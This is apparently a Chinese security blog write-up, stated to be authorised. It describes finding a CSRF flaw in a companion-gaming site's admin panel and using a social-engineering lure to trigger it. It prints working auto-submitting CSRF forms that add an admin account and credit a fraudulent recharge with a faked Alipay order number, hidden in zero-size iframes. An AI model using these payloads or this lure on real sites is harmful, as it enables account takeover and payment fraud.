一個猥瑣的持續性攻擊思路

註：1，相關站點運維已授權

一，事情的起初

我了，算是 歪歪 的忠實玩家吧，從直播間娛樂模板到相親模板，再到虎牙，再到現在陪玩。基本上能玩的都玩過。所以了，我的很多積蓄也都扔上面了，#（抱臉哭...）

對了，尤其是 陪玩 這個，記得當初頭腦一發熱，就在51X上花 500 開了個後台。

現在想想好是心痛啊，所以就想著，要不搞搞？友情一波？

在勘測的時候，發現，這個後台竟然不是用的官方模板後台，而是個人開發的。

都是類似於這樣 。

二，猥瑣套路的準備工作

首先簡單分析了下測試網站（測試站點為後台演示網站，與實際目標站點後台基本一致，兩個站點都有CDN），他有個自己寫的小waf，所以嘗試了XSS，注入，上傳都不行。而且用了百度雲加速，上傳文件限制很嚴。

這時候我也想過旁站C段，但是所有子域名都上了cdn，能試的方法都試了，不行，找不到真實IP，掃全網的話，我電腦太渣就沒去嘗試。

最後想想從邏輯方面著手吧。

測試了下越權修改他人密碼，信息，充值等操作，但是發現他的數據包裡面都沒有用戶相關信息，只有新舊密碼驗證，而且還有手機驗證。

突然，我發現站點好像沒有驗證session 或token 這個？難道存在 CSRF ？復現測試一下，我擦，好像真的存在 CSRF 。。。直接利用CSRF 這個漏洞添加上管理員了。

不過，感覺有點雞肋，不搞了，，，沒勁了。。。

三，猥瑣套路的進行

中間休息了大概一個月吧，沒去想這件事，都是在平台上玩玩，消費消費。

突然前幾天想起來這件事，心裡尋思按照道理來說這種網站是不會出售源碼的，應該是賣了使用權吧，而且看開發人員掛的廣告挺多的，沒辦法找到這個網站的開發人員。

不過，我發現好像整個歪歪工會的網站都是一個管理在維護的，那就套路一波吧 。

其實以前就聊過，只不過沒有涉及重點，只是想參考參考源碼類的，不過人家沒答應，畢竟這是商業化的，肯定不會給的。

這次找他呢，主要是運用心理戰術，大家說社工之前需要做好準備工作，收集信息，我這個人比較直也比較懶。什麼收集信息啊煩，我只知道幾件事：

1. 我的目標是某個網站

2. 這個網站程序是他開發的

3. 我需要靠他來搞定利用CSRF的機會

不過也不需要雜收集，畢竟都是網站類的，自己也比較熟悉，只構思了一個宏大的套路，恩，很宏大。

套路已經構思好，那就先開始套近乎吧。

那麼問題來了，我就一窮屌絲，沒錢，更別說數據了，咋搞啊？ MD ， 自己織的套路，含著淚也要織下去。。。。

然後找小夥伴借錢，先買了一個空間，恩，空間有了，那數據咋搞啊？早知道就不瞎幾把吹那麼大了，，，心累啊。。。。

身為一個白帽子，如何能為這點困難而折腰？百度搜索一波~

恩，找到了那麼一點點，，，就這吧，先糊弄的試試。。。

CSRF POC:

<html>n <body>n <form action="http://XXX.xxxxxx.com/Qwadmin/Peiwanmember/update.html" method="POST" name="myfrom">n <input type="hidden" name="head" value="" />n <input type="hidden" name="user" value="ooo" />n <input type="hidden" name="bid" value="5" />n <input type="hidden" name="group_id" value="1" />n <input type="hidden" name="password" value="123123" />n <input type="hidden" name="sex" value="0" />n <input type="hidden" name="fenlei_15" value="" />n <input type="hidden" name="fenlei_16" value="" />n <input type="hidden" name="fenlei_17" value="" />n <input type="hidden" name="phone" value="" />n <input type="hidden" name="qq" value="" />n <input type="hidden" name="yyid" value="" />n <input type="hidden" name="email" value="" />n <input type="hidden" name="zhifubao" value="" />n <input type="hidden" name="zhekou" value="100" />n <input type="hidden" name="tichengbili" value="70" />n <input type="hidden" name="info" value="" />nt t<script>nt<!--ntfunction sub(){ntdocument.myfrom.submit();nt}ntsetTimeout(sub,100);nt//-->nt</script>n </form>n </body>n</html>n

由於一定要滑鼠觸發事件，但是如果來個按鈕的話就很容易被發現問題，所以這裡用了

t t<script>nt<!--ntfunction sub(){ntdocument.myfrom.submit();nt}ntsetTimeout(sub,100);nt//-->nt</script>n

當用戶載入完頁面後0.1秒自動提交form表單，上面這個poc的話是添加管理員賬號的，那既然花錢當然也要來個自動充值的啊。

<html>n <body>n <form action="http://XXX.xxxxxx.com/Qwadmin/Peiwanmember/chongzhi.html" method="POST" name="myfrom">n <input type="hidden" name="aids" value="6018" />n <input type="hidden" name="numchong" value="300" />n <input type="hidden" name="numchongtype" value="5" />n <input type="hidden" name="numzeng" value="" />n <input type="hidden" name="oid" value="" />n <input type="hidden" name="cinfo" value="20170507200040011220210053559226+300 ?…»?¿‡?Œ«?Ÿ¥" />n <input type="hidden" name="numchongisshow" value="0" />n <input type="hidden" name="numchongshowinfo" value="?»­?´¹" />nt<script>nt<!--ntfunction sub(){ntdocument.myfrom.submit();nt}ntsetTimeout(sub,100);nt//-->nt</script>n </form>n </body>n</html>n

由於一定要訂單編號不然容易被發現，我自己隨便改了一個支付寶的訂單編號~

頁面也是需要提交表單的也是利用了之前那段js

t<script>nt<!--ntfunction sub(){ntdocument.myfrom.submit();nt}ntsetTimeout(sub,100);nt//-->nt</script>n

但是這時候又出現了一個問題，就是提交 form 表單的時候頁面會跳轉，這裡我決定把頁面用 iframe嵌入到社工庫裡面，確保不影響頁面跳轉。

<iframe src="chongzhiyy.html" frameBorder="0" width="0" scrolling="no" height="0"></iframe>n

<iframe src="tianjia.html" frameBorder="0" width="0" scrolling="no" height="0"></iframe>n

這樣就是頁面載入之後同時也載入tianjia.html、chongzhiyy.html兩個頁面，就是上面那兩個poc了。

之後就算頁面跳轉也是嵌入到頁面的小頁面跳轉。

萬事俱備，現在就等著那邊開發配合，把我的社工庫嵌入進去了，，，，不過還是出了點叉子。。。

看來，只能等周一去公司改改把登錄去掉，至於數據，頭好疼，，，

還是那句話，自己織的坑，含著淚，也要補上去。。。

經過三天的等待，終於成了。

那我就登錄我那個後台看看吧，看看管不管用。

好像成了？我趕緊看下啊網頁源代碼。

再看看那個CSRF 隱藏頁面。

接下來就是等管理打開這個應用了之後添加管理員賬號密碼了~ -.-

四，猥瑣套路的收尾

由於風險程度等一些原因，沒有等管理員觸發之前，就已經刪除源碼數據等。

事後並主動協調商議該事件 。

本文作者為226safe成員：小小艾_Joker 文章首發於 226safe Team 專欄 / 謝絕轉載

推薦閱讀：